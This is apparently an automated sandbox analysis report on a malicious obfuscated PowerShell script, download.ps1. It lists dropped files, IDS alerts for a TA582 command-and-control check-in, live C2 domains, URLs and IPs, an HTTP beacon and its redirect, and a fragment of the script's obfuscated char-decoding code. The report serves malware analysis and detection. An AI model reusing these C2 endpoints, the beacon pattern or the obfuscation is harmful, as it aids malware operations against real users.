Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: download.ps1
Detection: MAL
Classification: mal64.evad.winPS1@2/7@4/2
EGA Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 13
  • Number of non-executed functions: 3
Cookbook Comments:
  • Found application associated with file extension: .ps1
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 2800 because it is empty
                                                                                                  • Not all processes were analyzed, report is missing behavior information
                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  • VT rate limit hit for: download.ps1
Time     | Type            | Description
14:01:59 | API Interceptor | 45x Sleep call for process: powershell.exe modified
Match         | Associated Sample Name / URL | Detection | Threat Name | Context
45.61.136.138 | download.ps1                 | malicious | Unknown     | bfhdkgmmhdbikgj.top/gz782b5rhjhtr.php?id=computer&key=73964595488&s=527
              | download.ps1                 | malicious | Unknown     | bfhdkgmmhdbikgj.top/8j3zac462bhtr.php?id=user-PC&key=66957681081&s=527
              | download.ps1                 | malicious | Unknown     | kcehmenjdibnmni.top/sgat4cebpihtr.php?id=computer&key=24472055606&s=527
              | download.ps1                 | malicious | Unknown     | kcehmenjdibnmni.top/g6n2wfvsr0htr.php?id=user-PC&key=95416299579&s=527
              | download.ps1                 | malicious | Unknown     | kcehmenjdibnmni.top/m15teydqhphtr.php?id=computer&key=27186586974&s=527
              | download.ps1                 | malicious | Unknown     | kcehmenjdibnmni.top/trzyoqslw6htr.php?id=user-PC&key=43809224344&s=527
              | download.ps1                 | malicious | Unknown     | kcehmenjdibnmni.top/sce6dujwmhhtr.php?id=computer&key=21283751447&s=527
              | download.ps1                 | malicious | Unknown     | kcehmenjdibnmni.top/hlofm1brkshtr.php?id=user-PC&key=62803468549&s=527
              | download.ps1                 | malicious | Unknown     | kcehmenjdibnmni.top/aoter2umlhhtr.php?id=computer&key=39417889290&s=527
              | download.ps1                 | malicious | Unknown     | kcehmenjdibnmni.top/kqmlncu4i7htr.php?id=user-PC&key=66425560744&s=527
Match               | Associated Sample Name / URL | Detection | Threat Name | Context
bfhdkgmmhdbikgj.top | download.ps1                 | malicious | Unknown     | 45.61.136.138
                    | download.ps1                 | malicious | Unknown     | 45.61.136.138
Match      | Associated Sample Name / URL | Detection | Threat Name | Context
AS40676 US | download.ps1                 | malicious | Unknown     | 45.61.136.138
           | download.ps1                 | malicious | Unknown     | 45.61.136.138
           | LZUCldA1ro.exe               | malicious | Unknown     | 207.231.107.137
           | LZUCldA1ro.exe               | malicious | Unknown     | 207.231.107.137
           | download.ps1                 | malicious | Unknown     | 45.61.136.138
           | download.ps1                 | malicious | Unknown     | 45.61.136.138
           | download.ps1                 | malicious | Unknown     | 45.61.136.138
           | download.ps1                 | malicious | Unknown     | 45.61.136.138
           | Fantazy.spc.elf              | malicious | Unknown     | 41.216.189.243
           | armv6l.elf                   | malicious | Mirai       | 23.179.122.63
                                                                                                  No context
                                                                                                  No context
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:NlllulriAz:NllU2A
                                                                                                  MD5:88CD010331786B5B0D8F925A7B5EFE73
                                                                                                  SHA1:47B913E734AACA1331C5E8561FC01340D899A2DF
                                                                                                  SHA-256:58BC41921E8386AF7B31594E38A11BC63533D8D2B9D3803C640C3AAD8BD3CFF4
                                                                                                  SHA-512:437792D19577187888FC54489B47D34506E6275910DD03690A9BC746D23A906329251B2DBA227F82B39686C54A4E37A366DF5B5566F2387D57C882706B8D4E45
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:@...e.................................:.%............@..........
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6222
                                                                                                  Entropy (8bit):3.7047371337904265
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:rAwXfN3CNEoCkvhkvCCtW4IoyHl4Io2SHv:rbDhW4S4R
                                                                                                  MD5:EDE6C4D175B0DD3A32C671CA5E7907C5
                                                                                                  SHA1:C16671B8CE90370D61B164730D67240ACE7A236F
                                                                                                  SHA-256:E2B7A4B67A90B28AF1928870066E07AA2378B8093EB3FE63E211248D86C9E0D7
                                                                                                  SHA-512:3B92C275DDD2032934EA52AEF6F9A1EDEEADE6CF5BF9A38227F35A0E456ECA3EFD048AC828BA21DA87F85DEAE0902F11E3AA428A71A90DB84B4CC7447A742AF1
                                                                                                  Malicious:false
                                                                                                  Preview:...................................FL..................F.".. ...d........dtm`..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....C..pm`..{.utm`......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl&Z7.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....&Z9...Roaming.@......DWSl&Z9.....C.......................e.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl&Z7.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl&Z7.....E....................._...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl&Z7.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl&Z7.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl&Z<.....q...........
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6222
                                                                                                  Entropy (8bit):3.7047371337904265
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:rAwXfN3CNEoCkvhkvCCtW4IoyHl4Io2SHv:rbDhW4S4R
                                                                                                  MD5:EDE6C4D175B0DD3A32C671CA5E7907C5
                                                                                                  SHA1:C16671B8CE90370D61B164730D67240ACE7A236F
                                                                                                  SHA-256:E2B7A4B67A90B28AF1928870066E07AA2378B8093EB3FE63E211248D86C9E0D7
                                                                                                  SHA-512:3B92C275DDD2032934EA52AEF6F9A1EDEEADE6CF5BF9A38227F35A0E456ECA3EFD048AC828BA21DA87F85DEAE0902F11E3AA428A71A90DB84B4CC7447A742AF1
                                                                                                  Malicious:false
                                                                                                  Preview:...................................FL..................F.".. ...d........dtm`..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....C..pm`..{.utm`......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl&Z7.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....&Z9...Roaming.@......DWSl&Z9.....C.......................e.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl&Z7.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl&Z7.....E....................._...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl&Z7.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl&Z7.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl&Z<.....q...........
                                                                                                  File type:ASCII text, with very long lines (10716), with CRLF line terminators
                                                                                                  Entropy (8bit):5.981936613104156
                                                                                                  TrID:
                                                                                                    File name:download.ps1
                                                                                                    File size:19'664 bytes
                                                                                                    MD5:f44b774aac3ec4688531510b0c1eaf52
                                                                                                    SHA1:48e0b9a7650ff5b4294d6a5e6d4bdd6a113ffd1b
                                                                                                    SHA256:f0802f6ec8278c7b05dcfcc763107f37f4e78c24d87d881f9fa36dfe6918a36e
                                                                                                    SHA512:253a0f366c0edd5d942d8617d14b7c91e2de3d2900d9e3b806198b298a0b6fbfd98461c64eb25b5729c72359ef3b70fd5ac442277b49cd63f3eddd5e1409a750
                                                                                                    SSDEEP:384:bYPGNt7hmkZyaHP8Zt82RWkWFV0hFfHHGb4K/KFbAu2HFKy/:mGRF3P8Z62ZUV0hFfnVO2gFp
                                                                                                    TLSH:D2926CB63B8DFDD2C58BD62D2607BC087F45746FE0E65AC4AF19D1C263026547B86C81
                                                                                                    File Content Preview:$fvhtpujqnrdsi=$executioncontext;$eresonrereeredalaninalaten = -join (0..54 | ForEach-Object {[char]([int]"0000012700000126000001310000012400000130000001280000013000000129000001290000012400000130000001220000012300000129000001260000013000000128000001300000
                                                                                                    Icon Hash:3270d6baae77db44
Timestamp                       | SID     | Signature                                             | Severity | Source IP   | Source Port | Dest IP        | Dest Port | Protocol
2025-01-06T20:02:05.019539+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2        | 192.168.2.5 | 53907       | 45.61.136.138  | 80        | TCP
2025-01-06T20:02:05.019539+0100 | 2057741 | ET MALWARE TA582 CnC Checkin                          | 1        | 192.168.2.5 | 53907       | 45.61.136.138  | 80        | TCP
2025-01-06T20:02:06.031749+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2        | 192.168.2.5 | 53908       | 142.250.186.36 | 80        | TCP
Timestamp                          | Source Port | Dest Port | Source IP      | Dest IP
Jan 6, 2025 20:02:03.784248114 CET | 53906       | 53        | 192.168.2.5    | 1.1.1.1
Jan 6, 2025 20:02:03.789922953 CET | 53          | 53906     | 1.1.1.1        | 192.168.2.5
Jan 6, 2025 20:02:03.790016890 CET | 53906       | 53        | 192.168.2.5    | 1.1.1.1
Jan 6, 2025 20:02:03.790070057 CET | 53906       | 53        | 192.168.2.5    | 1.1.1.1
Jan 6, 2025 20:02:03.796158075 CET | 53          | 53906     | 1.1.1.1        | 192.168.2.5
Jan 6, 2025 20:02:04.249233961 CET | 53          | 53906     | 1.1.1.1        | 192.168.2.5
Jan 6, 2025 20:02:04.251491070 CET | 53906       | 53        | 192.168.2.5    | 1.1.1.1
Jan 6, 2025 20:02:04.256483078 CET | 53          | 53906     | 1.1.1.1        | 192.168.2.5
Jan 6, 2025 20:02:04.256563902 CET | 53906       | 53        | 192.168.2.5    | 1.1.1.1
Jan 6, 2025 20:02:04.262587070 CET | 53907       | 80        | 192.168.2.5    | 45.61.136.138
Jan 6, 2025 20:02:04.267380953 CET | 80          | 53907     | 45.61.136.138  | 192.168.2.5
Jan 6, 2025 20:02:04.267468929 CET | 53907       | 80        | 192.168.2.5    | 45.61.136.138
Jan 6, 2025 20:02:04.270276070 CET | 53907       | 80        | 192.168.2.5    | 45.61.136.138
Jan 6, 2025 20:02:04.275055885 CET | 80          | 53907     | 45.61.136.138  | 192.168.2.5
Jan 6, 2025 20:02:04.968200922 CET | 80          | 53907     | 45.61.136.138  | 192.168.2.5
Jan 6, 2025 20:02:04.982336044 CET | 53908       | 80        | 192.168.2.5    | 142.250.186.36
Jan 6, 2025 20:02:04.987170935 CET | 80          | 53908     | 142.250.186.36 | 192.168.2.5
Jan 6, 2025 20:02:04.987289906 CET | 53908       | 80        | 192.168.2.5    | 142.250.186.36
Jan 6, 2025 20:02:04.987445116 CET | 53908       | 80        | 192.168.2.5    | 142.250.186.36
Jan 6, 2025 20:02:04.992172956 CET | 80          | 53908     | 142.250.186.36 | 192.168.2.5
Jan 6, 2025 20:02:05.019539118 CET | 53907       | 80        | 192.168.2.5    | 45.61.136.138
Jan 6, 2025 20:02:06.031631947 CET | 80          | 53908     | 142.250.186.36 | 192.168.2.5
Jan 6, 2025 20:02:06.031656981 CET | 80          | 53908     | 142.250.186.36 | 192.168.2.5
Jan 6, 2025 20:02:06.031675100 CET | 80          | 53908     | 142.250.186.36 | 192.168.2.5
Jan 6, 2025 20:02:06.031692982 CET | 80          | 53908     | 142.250.186.36 | 192.168.2.5
Jan 6, 2025 20:02:06.031704903 CET | 80          | 53908     | 142.250.186.36 | 192.168.2.5
Jan 6, 2025 20:02:06.031716108 CET | 80          | 53908     | 142.250.186.36 | 192.168.2.5
Jan 6, 2025 20:02:06.031749010 CET | 53908       | 80        | 192.168.2.5    | 142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.031789064 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.031945944 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.031959057 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.031974077 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.031989098 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.031994104 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.032047987 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.036590099 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.036602974 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.036613941 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.036655903 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.082041979 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.117407084 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.121484995 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.121496916 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.121507883 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.121550083 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.121583939 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.121656895 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.121711016 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.121761084 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.126849890 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.126863003 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.126873970 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.126914978 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.133146048 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.133160114 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.133171082 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.133199930 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.133224010 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.139291048 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.139303923 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.139322042 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.139341116 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.145601988 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.145615101 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.145626068 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.145647049 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.145673990 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.151868105 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.151885033 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.151896000 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.151941061 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.158113956 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.158126116 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.158135891 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.158152103 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.158179998 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.164349079 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.164361954 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.164372921 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.164407015 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.170567989 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.170586109 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.170651913 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.211163998 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.211194992 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.211213112 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.211276054 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.211440086 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.211452007 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.211467028 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.211477995 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.211493969 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.211534977 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.212615967 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.212627888 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.212639093 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.212666035 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.212697029 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.218864918 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.218875885 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.218946934 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.218975067 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.218983889 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.219023943 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.225282907 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.225296021 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.225306034 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.225344896 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.235361099 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.235372066 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.235416889 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.600836039 CET5390780192.168.2.545.61.136.138
                                                                                                    Jan 6, 2025 20:02:06.600987911 CET5390880192.168.2.5142.250.186.36
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 6, 2025 20:02:02.704088926 CET | 54453 | 53 | 192.168.2.5 | 1.1.1.1
Jan 6, 2025 20:02:03.691757917 CET | 54453 | 53 | 192.168.2.5 | 1.1.1.1
Jan 6, 2025 20:02:03.783796072 CET | 53 | 54453 | 1.1.1.1 | 192.168.2.5
Jan 6, 2025 20:02:04.335916042 CET | 53 | 54453 | 1.1.1.1 | 192.168.2.5
Jan 6, 2025 20:02:04.969755888 CET | 63870 | 53 | 192.168.2.5 | 1.1.1.1
Jan 6, 2025 20:02:04.976602077 CET | 53 | 63870 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 6, 2025 20:02:02.704088926 CET | 192.168.2.5 | 1.1.1.1 | 0xb467 | Standard query (0) | bfhdkgmmhdbikgj.top | A (IP address) | IN (0x0001) | false
Jan 6, 2025 20:02:03.691757917 CET | 192.168.2.5 | 1.1.1.1 | 0xb467 | Standard query (0) | bfhdkgmmhdbikgj.top | A (IP address) | IN (0x0001) | false
Jan 6, 2025 20:02:03.790070057 CET | 192.168.2.5 | 1.1.1.1 | 0x1 | Standard query (0) | bfhdkgmmhdbikgj.top | A (IP address) | IN (0x0001) | false
Jan 6, 2025 20:02:04.969755888 CET | 192.168.2.5 | 1.1.1.1 | 0x2b27 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 6, 2025 20:02:04.249233961 CET | 1.1.1.1 | 192.168.2.5 | 0x1 | No error (0) | bfhdkgmmhdbikgj.top | | 45.61.136.138 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 20:02:04.335916042 CET | 1.1.1.1 | 192.168.2.5 | 0xb467 | No error (0) | bfhdkgmmhdbikgj.top | | 45.61.136.138 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 20:02:04.976602077 CET | 1.1.1.1 | 192.168.2.5 | 0x2b27 | No error (0) | www.google.com | | 142.250.186.36 | A (IP address) | IN (0x0001) | false
                                                                                                    • bfhdkgmmhdbikgj.top
                                                                                                    • www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 53907 | 45.61.136.138 | 80 | 2800 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 20:02:04.270276070 CET | 216 | OUT | GET /f7qe6pa3v1htr.php?id=user-PC&key=63266493739&s=527 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: bfhdkgmmhdbikgj.top
    Connection: Keep-Alive
Jan 6, 2025 20:02:04.968200922 CET | 166 | IN | HTTP/1.1 302 Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 06 Jan 2025 19:02:04 GMT
    Content-Length: 0
    Connection: keep-alive
    Location: http://www.google.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 53908 | 142.250.186.36 | 80 | 2800 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 20:02:04.987445116 CET | 159 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: www.google.com
    Connection: Keep-Alive
Jan 6, 2025 20:02:06.031631947 CET | 1236 | IN | HTTP/1.1 200 OK
    Date: Mon, 06 Jan 2025 19:02:05 GMT
    Expires: -1
    Cache-Control: private, max-age=0
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-dOqGI8EeMr2eEXmd9UgJsw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Server: gws
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: AEC=AZ6Zc-XCeZMZ0wiwM-u4y6mizNCA-OFAqZFLEM3_P9Xm5IDBSeOoP-bmHA; expires=Sat, 05-Jul-2025 19:02:05 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
